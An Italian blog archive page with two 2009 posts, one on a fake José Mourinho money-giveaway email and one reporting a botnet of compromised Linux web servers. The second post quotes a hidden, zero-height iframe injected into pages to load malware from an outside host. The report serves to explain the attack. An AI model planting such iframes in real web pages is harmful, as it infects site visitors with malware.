Archive for settembre, 2009

Mourinho, bufala sul web: “Scrivimi e ti do 1 milione di $”

Inserito da 19 settembre, 2009 (0) Commenti

In Inghilterra in migliaia non hanno resistito al messaggio di posta elettronica, spedito dall’indirizzo jose_1@ovi.com, che diceva: “Ho un milione di dollari da regalare. Se fai parte di un’organizzazione no profit, mandami i tuoi dati”

Da bufale

Sareste in grado di dire di no a Josè Mourinho? A una sua mail che vi propone di mettervi in contatto con lui? Appassionati del pallone e donne ammaliate dal fascino del bel Josè proprio non ce la farebbero… E infatti in Inghilterra, in migliaia non hanno resistito al messaggio di posta elettronica spedito dall’indirizzo jose_mourinho1@ovi.com.

“Ciao, probabilmente ti sorprende un po’ ricevere questa mail se finora hai solo letto o sentito parlare di me e non mi conosci di persona. Beh, sono Josè Mourinho”. Comincia così l’ultima hoax su Internet, la nuova che corre in rete oltremanica, con Mourinho che si presenta, con tanto di dati anagrafici, per poi snocciolare – in un inglese davvero poco special – la sua carriera da allenatore, con rimandi al suo sito ufficiale e pure a quello dell’Inter. Per poi arrivare al punto di fare un’offerta stupefacente: “Ho un milione di dollari da regalare. Se fai parte di un’organizzazione no profit, mandami i tuoi dati”.

Chiaramente la casella di posta si è intasata in pochi minuti di messaggi da associazioni di volontariato vere e false, furbetti che ci provano e semplici tifosi. Ma quei messaggi a Mourinho, quello vero, non sono mai arrivati. Solo uno scherzo, con qualche sospetto di truffa vista la richiesta di dati personali. Peccato perché l’idea del milione in regalo era buona. Se qualcuno ha la mail di Mourinho, gliela proponga.

Categories : Bufale e Hoax,Leggende Metropolitane Tags : , ,

Nuovo attacco ai server web Linux, botnet via iframe apache e nginx

Inserito da 15 settembre, 2009 (0) Commenti

Si tratta di :Exploits

Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :

<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Tale tecnica non fa altro che aumentare le macchine zombie.

Cosa avviene in parole semplici :

i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo  installato nginx  potente server  http e un mail proxy  server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.

Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.

Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Categories : Exploits Tags :
Pagina 1 di 11